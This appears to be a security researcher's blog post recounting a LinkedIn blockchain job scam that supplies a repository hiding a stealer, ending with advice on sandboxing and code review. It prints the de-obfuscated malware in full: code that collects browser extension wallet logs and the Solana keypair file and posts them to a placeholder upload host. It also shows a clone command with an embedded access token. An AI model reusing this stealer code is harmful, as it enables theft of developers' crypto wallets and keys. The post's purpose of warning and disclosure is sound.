From Opportunity to Threat: My Encounter with a Blockchain Job Scam

Beware of Sophisticated Job Scams Targeting Blockchain Developers

Muhammad Abdullah
5 min read · May 29, 2024

As a security researcher and smart contract auditor, I’m constantly on the lookout for new opportunities and interesting projects. However, not all that glitters is gold, and recently, I encountered a scam that every developer in the web2/web3 space should be aware of.

The Hook: A Tempting Job Offer

It all started with a LinkedIn message from a person proposing an attractive project.

Additionally, the message mentioned, “We are also flexible with your hourly rate. We would appreciate it if you could let me know your suggested role and hourly rate.”

Intrigued by the offer, I responded professionally, and soon after, I received a hiring form.

The form asked me to provide an estimation and contained instructions to run an existing Node.js backend.

Here’s an excerpt from the hiring form:

“Provide estimation. After running the existing Node.js backend, you will get an API-website on port 5000. Through this API-website, check all the functions [including function name & params] of the smart contract you will develop.

You can get the project by using the following command:

git clone https://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@github.com/Sudi857/reward_backend.git”

The Red Flag: Too Good to Be True?

The rates offered were more lucrative than usual, which raised my suspicion. Moreover, there was no other response, and the recruiter's profile looked phishy too. I also had the Axie Infinity hack in mind. To be safe, I decided to set up a separate environment in the cloud to test the code. This is a crucial step that every developer should take when dealing with unfamiliar code, especially code downloaded from potentially unreliable sources.

The Discovery: Malicious Code Hidden Within

An initial look at the code directory showed that it was a Node.js project.

I remembered a post on thehackernews explaining how bogus npm packages are being used to trick software developers into installing malware.

I did a quick cat of package.json and hit the first red flag: the package name is “bot_manager”. Now my suspicion was getting stronger.

Looking further, I found a somewhat interesting file, “encryptionUtilities.js”, under the “/utils/” folder.

Upon viewing the file, I found some obfuscated JS code that looked malicious and phishy to me.

After a quick de-obfuscation using GPT, it turned out to be malicious code:

const path = require('path');
const request = require('request');
const { exec } = require('child_process');
const os = require('os');
const fs = require('fs');

const base64Decode = (str) => Buffer.from(str, 'base64').toString('utf8');

const pt = path;
const rq = request;
const ex = exec;

const hs = os.hostname();
const pl = os.platform();
const hd = os.homedir();
const td = os.tmpdir();

const resolvePath = (str) => {
  return str.replace(/^~([a-z]+|\/)/, (match, p1) => {
    return '/' === p1 ? hd : `${pt.dirname(hd)}/${p1}`;
  });
};

const decodeBase64String = (str) => base64Decode(str);

const checkFileExistence = (filePath) => {
  try {
    fs.accessSync(filePath);
    return true;
  } catch {
    return false;
  }
};

const collectLocalFiles = async (dir, prefix, includeSolanaId) => {
  let results = [];
  if (!checkFileExistence(dir)) {
    return results;
  }

  const localExtensionSettings = 'Local Extension Settings';
  const createReadStream = 'createReadStream';
  const logFile = '.log';

  const dirsToScan = [
    'Google/Chrome',
    'BraveSoftware/Brave-Browser',
    'opera_stable',
    'com.operasoftware.Opera',
    'opera',
    // ... more directories as needed
  ];

  for (let i = 0; i < dirsToScan.length; i++) {
    const fullPath = path.join(dir, localExtensionSettings, dirsToScan[i]);
    if (checkFileExistence(fullPath)) {
      try {
        const files = fs.readdirSync(fullPath);
        files.forEach((file) => {
          const filePath = path.join(fullPath, file);
          if (filePath.includes(logFile)) {
            results.push({
              value: fs[createReadStream](filePath),
              options: { filename: `${prefix}${i}_${file}` }
            });
          }
        });
      } catch {}
    }
  }

  if (includeSolanaId) {
    const solanaIdFilePath = path.join(hd, 'config/solana/id.json');
    if (fs.existsSync(solanaIdFilePath)) {
      results.push({
        value: fs[createReadStream](solanaIdFilePath),
        options: { filename: 'solana_id.txt' }
      });
    }
  }

  uploadCollectedData(results);
  return results;
};

const uploadCollectedData = (data) => {
  const multiFile = 'multi_file';
  const uploadPath = '/uploads';

  const payload = {
    timestamp: Date.now().toString(),
    type: 's0tINw6',
    hid: hs,
    [multiFile]: data
  };

  const url = 'http://example.com/upload';
  try {
    const options = {
      url,
      formData: payload
    };
    rq.post(options, (err, res, body) => {});
  } catch {}
};

// Main Execution

(async () => {
  try {
    await collectLocalFiles(hd, 'profile', true);
    await collectLocalFiles(path.join(hd, 'config'), 'config', false);
  } catch {}
})();

This malicious script was intended to exfiltrate browser extension log files (from the “Local Extension Settings” directories it scans, where wallet extensions keep their data) and the Solana keypair file to a remote server controlled by the attacker.

The Lesson: Vigilance and Best Practices

This experience underscores the importance of vigilance and adhering to best practices in security, particularly when dealing with potentially untrusted code. Here are some takeaways:

1. Always verify the source: Be cautious of projects from unknown sources, especially if they involve sensitive operations like managing private keys.

2. Use isolated environments: When testing unfamiliar code, use isolated environments such as virtual machines or sandboxed environments to prevent any potential damage to your main system.

3. Inspect code thoroughly: Take the time to inspect and understand the code you are running. Look for any signs of obfuscation or unexpected network requests.

4. Educate others: Share your experiences and findings with the community to raise awareness and help others avoid similar pitfalls.

While the blockchain space offers exciting opportunities, it also attracts malicious actors looking to exploit unsuspecting developers. By staying vigilant and following best practices, we can protect ourselves and our assets from these sophisticated scams.

Stay safe, and always question offers that seem too good to be true.

*If you found this post helpful, please share it with your network. Let’s work together to keep our community safe!*
